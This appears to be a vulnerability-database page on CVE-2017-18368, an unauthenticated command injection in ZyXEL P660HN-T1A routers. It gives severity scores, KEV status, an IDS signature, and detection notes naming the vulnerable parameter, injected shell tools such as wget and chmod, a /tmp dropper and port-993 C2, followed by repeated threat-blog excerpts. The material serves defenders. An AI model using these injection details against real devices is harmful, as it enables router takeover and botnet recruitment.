CVE-2017-18368
published 2019-05-02CVE-2017-18368: The ZyXEL P660HN-T1A v1 TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31 router distributed by TrueOnline has a command injection vulnerability in the Remote System…
PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2023-08-28
Exploited in the wild
EPSS
94.51%
99.8th percentile
The ZyXEL P660HN-T1A v1 TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31 router distributed by TrueOnline has a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user. The vulnerability is in the ViewLog.asp page and can be exploited through the remote_host parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| billion | 5200w-t_firmware | — | — |
| zyxel | p660hn-t1a_v1_firmware | — | — |
| zyxel | p660hn-t1a_v2_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE (CVE-2017-18368)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/ViewLog.asp"; startswith; endswith; http.request_body; content:"remote_submit_Flag="; startswith; content:"&remote_host="; distance:0; content:"&remoteSubmit=Save|0d 0a 0d 0a|"; endswith; fast_pattern; reference:url,seclists.org/fulldisclosure/2017/Jan/40; reference:cve,2017-18368; reference:url,github.com/pedrib/PoC/blob/master/advisories/zyxel_trueonline.txt; classtype:attempted-user; sid:2027092; rev:6; metadata:attack_target IoT, created_at 2019_03_18, cve CVE_2017_18368, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_04_13;)
- →Exploit targets POST /cgi-bin/ViewLog.asp with injection via the remote_host parameter; look for semicolons and shell commands (wget, chmod) in the remote_host field of HTTP POST bodies to this endpoint. ↗
- →The exploit HTTP request uses the distinctive User-Agent string 'Ankit'; alert on POST requests to /cgi-bin/ViewLog.asp with this User-Agent. ↗
- →The POST body always begins with 'remote_submit_Flag=' and contains '&remote_host=' followed by injected shell commands; use these as body content anchors for detection (ET SID 2027092).
- →Malware dropper payload drops ARM7 binary to /tmp and executes it with argument 'zyxel'; monitor for process execution of files dropped to /tmp on embedded Linux devices. ↗
- →C2 communication occurs over TCP port 993 (typically associated with IMAPS) to the dropper server; monitor for outbound TCP/993 connections from IoT/router devices to unexpected IPs. ↗
- →The exploit is accessible without authentication; any unauthenticated POST to /cgi-bin/ViewLog.asp should be treated as suspicious on ZyXEL P660HN-T1A devices. ↗
- ·The vulnerability affects specifically the TrueOnline-distributed ZyXEL P660HN-T1A v1 firmware (TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31); other P660HN-T v1 variants in other countries may also be vulnerable but were not confirmed in a live environment. ↗
- ·The Metasploit module was tested only in an emulated environment, not on a live physical device; real-world behavior may differ. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8hjr-66w2-mg84: The ZyXEL P660HN-T1A v1 TCLinux Fw $7
ghsa_unreviewed·2022-05-24
CVE-2017-18368 [CRITICAL] CWE-78 GHSA-8hjr-66w2-mg84: The ZyXEL P660HN-T1A v1 TCLinux Fw $7
The ZyXEL P660HN-T1A v1 TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31 router distributed by TrueOnline has a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user. The vulnerability is in the ViewLog.asp page and can be exploited through the remote_host parameter.
VulnCheck
Zyxel P660HN-T1A Routers Command Injection Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-18368 [CRITICAL] CWE-78 Zyxel P660HN-T1A Routers Command Injection Vulnerability
Zyxel P660HN-T1A Routers Command Injection Vulnerability
Zyxel P660HN-T1A routers contain a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user and exploited via the remote_host parameter of the ViewLog.asp page.
Affected: Zyxel P660HN-T1A Routers
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; https://cujo.com/blog/iot-botnet-report-2021-malware-and-vulnerabilities-targeted/; https://blog.apnic.net/2021/12/23/preparing-for-the-next-large-scale-
CISA
Zyxel P660HN-T1A Routers Command Injection Vulnerability
cisa·2023-08-07·CVSS 9.8
CVE-2017-18368 [CRITICAL] CWE-78 Zyxel P660HN-T1A Routers Command Injection Vulnerability
Vulnerability: Zyxel P660HN-T1A Routers Command Injection Vulnerability
Affected: Zyxel P660HN-T1A Routers
Zyxel P660HN-T1A routers contain a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user and exploited via the remote_host parameter of the ViewLog.asp page.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-a-new-variant-of-gafgyt-malware; https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-vulnerability-in-p660hn-t1a-dsl-cpe; https://nvd.nist.gov/vuln/detail/CVE-2017-18368
Remediation Due
Suricata
ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE (CVE-2017-18368)
suricata·2019-03-18·CVSS 9.8
CVE-2017-18368 [CRITICAL] ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE (CVE-2017-18368)
ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE (CVE-2017-18368)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE (CVE-2017-18368)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/ViewLog.asp"; startswith; endswith; http.request_body; content:"remote_submit_Flag="; startswith; content:"&remote_host="; distance:0; content:"&remoteSubmit=Save|0d 0a 0d 0a|"; endswith; fast_pattern; reference:url,seclists.org/fulldisclosure/2017/Jan/40; reference:cve,2017-18368; reference:url,github.com/pedrib/PoC/blob/master/advisories/zyxel_trueonline.txt; classtype:attempted-user; sid:2027092; rev:6; metadata:attack_target IoT, created_at 2019_03_18, cve CVE_2017_18368, deployment Perimeter, performance_impact Low, confidenc
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
Januar
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
# RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus
2025/10/09
Read time: ( words)
Save to Folio
Key takeaways
- The campaign exposes organizations to the risks of data exfiltration, persistent network compromise, and operational disruption for organizations with exposed infrastructure.
- Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vul
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus 2025/10/09 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
January
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Ciberamenazas
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Fortinet
2022 IoT Threat Review | FortiGuard Labs
blogs_fortinet·2023-01-13·CVSS 8.8
[HIGH] 2022 IoT Threat Review | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
2022 IoT Threat Review
By Eduardo Altares, Joie Salvio and Roy Tay | January 13, 2023
FortiGuard Labs monitors the IoT botnet threat landscape for new and emerging campaigns. We do this with the assistance of our honeypots we have deployed to capture active attacks in the wild. This article provides insights into the data collected from our monitoring system over the past year.
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
Attack Origins
Our distributed honeypot systems allow us to capture and monitor campaigns that are actively targeting IoT devices for infection. In most cases, these devices are turned into bots used to perform Distributed Denial o
Fortinet
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
blogs_fortinet·2022-04-12
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Enemybot: A Look into Keksec's Latest DDoS Botnet
By Joie Salvio and Roy Tay | April 12, 2022
In mid-March, FortiGuard Labs observed a new DDoS botnet calling itself “Enemybot” and attributing itself to Keksec, a threat group that specializes in cryptomining and DDoS attacks.
This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
It uses several methods of obfuscation for its strings to hinder analysis and hide itself from other botnets. Furthermore, it connects to a command-and-control (C2) server that is hidden in the Tor network, making its takedown more complicated.
Enemybot has been seen targeting routers from Seowon Intech, D-Link, and exploits a recently reported
Unit42
Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
blogs_unit42·2019-10-31·CVSS 9.8
[CRITICAL] Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
Threat Research Center
Threat Research
Cybercrime
## Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
Asher Davila
Published: October 31, 2019
Cybercrime
Threat Research
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
WiFi routers
## Executive Summary
In September 2019, during the proactive IoT threat-hunting process conducted daily by the Unit 42 (formerly Zingbox security research) team, we discovered an updated Gafgyt variant attempting to infect IoT devices; specifically small office/home wireless routers of known commercial brands like Zyxel, Huawei, and Realtek. This Gafgyt variant is a competing botnet to the JenX botnet, which also uses remote code execution exploits to gain access and recruit routers into botnets to attack gaming servers - mos
Unit42
Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
blogs_unit42·2019-10-31·CVSS 9.8
[CRITICAL] Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
## Executive Summary
In September 2019, during the proactive IoT threat-hunting process conducted daily by the Unit 42 (formerly Zingbox security research) team, we discovered an updated Gafgyt variant attempting to infect IoT devices; specifically small office/home wireless routers of known commercial brands like Zyxel, Huawei, and Realtek. This Gafgyt variant is a competing botnet to the JenX botnet, which also uses remote code execution exploits to gain access and recruit routers into botnets to attack gaming servers - most notably those running the Valve Source engine - and cause a Denial of Service (DoS). This variant also competes against similar botnets, which we have found are frequently sold on Instagram. According to Shodan scans, there are more than 32,000 WiFi routers potentia
http://www.zyxel.com/support/announcement_unauthenticated.shtmlhttps://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txthttps://seclists.org/fulldisclosure/2017/Jan/40https://ssd-disclosure.com/index.php/archives/2910https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/http://www.zyxel.com/support/announcement_unauthenticated.shtmlhttps://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txthttps://seclists.org/fulldisclosure/2017/Jan/40https://ssd-disclosure.com/index.php/archives/2910https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-18368
2019-05-02
Published
2023-08-07
Added to CISA KEV
Exploited in the wild